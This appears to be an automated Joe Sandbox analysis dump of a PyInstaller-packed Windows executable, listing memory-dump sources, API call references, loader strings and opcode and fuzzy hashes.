• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
• Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction ID: b00a13361c43f882c3d9dc7e2ff6d330094b8b229ca819b7d7d68bea95002607
• Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
• Instruction Fuzzy Hash: 4E02B324A1DB0B91EA17BB15BC19574A3A3FF647B4BE40831C52E022A4EF3CB14D8A34
APIs
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
• Instruction ID: c0e9453daa5319c9a977e43f5a8ddc277bb9b255e9adbe2c55aa8a73e99b43f6
• Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
• Instruction Fuzzy Hash: 52313E72609B8186EB619F60EC843EEB361FB94758F44443ADB4E47B99DF38D548CB20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72C675C45
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C675598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755AC
  • Part of subcall function 00007FF72C66A948: RtlFreeHeap.NTDLL(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
  • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
  • Part of subcall function 00007FF72C66A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72C66A8DF,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66A909
  • Part of subcall function 00007FF72C66A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72C66A8DF,?,?,?,?,?,00007FF72C66A7CA), ref: 00007FF72C66A92E
• _get_daylight.LIBCMT ref: 00007FF72C675C34
  • Part of subcall function 00007FF72C6755F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C67560C
• _get_daylight.LIBCMT ref: 00007FF72C675EAA
• _get_daylight.LIBCMT ref: 00007FF72C675EBB
• _get_daylight.LIBCMT ref: 00007FF72C675ECC
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72C67610C), ref: 00007FF72C675EF3
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
APIs
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
APIs
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
APIs
• _get_daylight.LIBCMT ref: 00007FF72C675EAA
  • Part of subcall function 00007FF72C6755F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C67560C
• _get_daylight.LIBCMT ref: 00007FF72C675EBB
  • Part of subcall function 00007FF72C675598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755AC
• _get_daylight.LIBCMT ref: 00007FF72C675ECC
  • Part of subcall function 00007FF72C6755C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C6755DC
  • Part of subcall function 00007FF72C66A948: RtlFreeHeap.NTDLL(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A95E
  • Part of subcall function 00007FF72C66A948: GetLastError.KERNEL32(?,?,?,00007FF72C672D22,?,?,?,00007FF72C672D5F,?,?,00000000,00007FF72C673225,?,?,?,00007FF72C673157), ref: 00007FF72C66A968
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72C67610C), ref: 00007FF72C675EF3
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 3458911817-0
APIs
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 54951025-0
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655840
• GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655852
• GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655889
• GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65589B
• GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558B4
• GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558C6
• GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558DF
• GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6558F1
• GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65590D
• GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65591F
• GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65593B
• GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65594D
• GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655969
• GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C65597B
• GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C655997
• GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559A9
• GetProcAddress.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559C5
• GetLastError.KERNEL32(?,00007FF72C6564CF,?,00007FF72C65336E), ref: 00007FF72C6559D7
Strings
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
• API String ID: 199729137-653951865
APIs
  • Part of subcall function 00007FF72C659390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72C6545F4,00000000,00007FF72C651985), ref: 00007FF72C6593C9
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF72C6586B7,?,?,00000000,00007FF72C653CBB), ref: 00007FF72C65822C
  • Part of subcall function 00007FF72C652810: MessageBoxW.USER32 ref: 00007FF72C6528EA
Strings
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                  • String ID: P%
                                                                                                                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                  • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                  • Instruction ID: c856e71026625c4dcf53e9d161458fe9742495b3ee8c397dc4c6480bcee77c74
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B151E9366047A186D6349F36E4181BAF7A2FBA8B65F404125EFDE43694DF3CD045DB20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                  • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                  • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                  • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                  • Instruction ID: c43abbecf4a9d3081e3c19240c48d32a48b423849fa415f034b3ea1467b0ae38
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66218821B08A4381E7526B7AFC45179A352FFA8BF0F984531DB1D437D8DE2CD5958B20
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                  • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                  • Instruction ID: d6145e58236951280cdc39b865d6008e905f2ee23aaf1e4de42334ebbbf37fb7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B127061E0824386FB227A15F954279F6B3FB60764FE4813DE68A466C4DF7CE5808F21
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                  • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                  • Instruction ID: 808a7fa6049103a88b91e57bc9f78050900597928f8c3b4ea897a958b3d5c613
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17127461E0C14386FB21BA15EC54679F6B3FBA0764FE44039D69A47AC4DB7CE4808F60
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                  • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                  • Opcode ID: bdb51f189eec0aae26590c8a1b92bbb562030306dab734aaada4990c27a5542a
                                                                                                                                                                                                                                  • Instruction ID: f313f5aa19bce955fab23999e56595ac6e7fc054a09b00b6304cdae7fab1f308
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdb51f189eec0aae26590c8a1b92bbb562030306dab734aaada4990c27a5542a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD41B521B0865381EA12FB129C016B9F396FFA4BE4FE44931EE0C07785DE3CE5458B60
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: a8e221c47165c0dbec1a7dc4007f346f16716469ebf4d834264a8452580f1fe3
• Instruction ID: 3c93293992452c50435354a42f86e2d4df4e9d2704875170620fcf1a7f9a3b6e
• Opcode Fuzzy Hash: a8e221c47165c0dbec1a7dc4007f346f16716469ebf4d834264a8452580f1fe3
• Instruction Fuzzy Hash: 1A418161A0854385EA02EB21DC411B9F392FFA47E4FE44932EE4D07B99DE3CE5458F64

Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
• Instruction ID: cf1b7d9260b1dd337f322538d9dc9c3f42fb4c4a0a2055fb6799c411062e17d4
• Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
• Instruction Fuzzy Hash: 05D18232A0878186EB21AB65D9803ADB7A2FB657E8F600135DF4D57795DF3CE081CB11

APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652D63
• MessageBoxW.USER32 ref: 00007FF72C652D99
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
• API String ID: 3940978338-251083826
• Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
• Instruction ID: e5da6b28d70f97c550be33878bb7928a7a18930d417b19fe976bc6fb89343c7f
• Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
• Instruction Fuzzy Hash: 0731F622708A4142E721BB25AC142ABA792FF987E8F900136EF4D93759DF3CD50ACB10

APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD4D
• GetLastError.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD5B
• LoadLibraryExW.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DD85
• FreeLibrary.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DDF3
• GetProcAddress.KERNEL32(?,?,?,00007FF72C65DF7A,?,?,?,00007FF72C65DC6C,?,?,?,00007FF72C65D869), ref: 00007FF72C65DDFF
Memory Dump Source
• Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
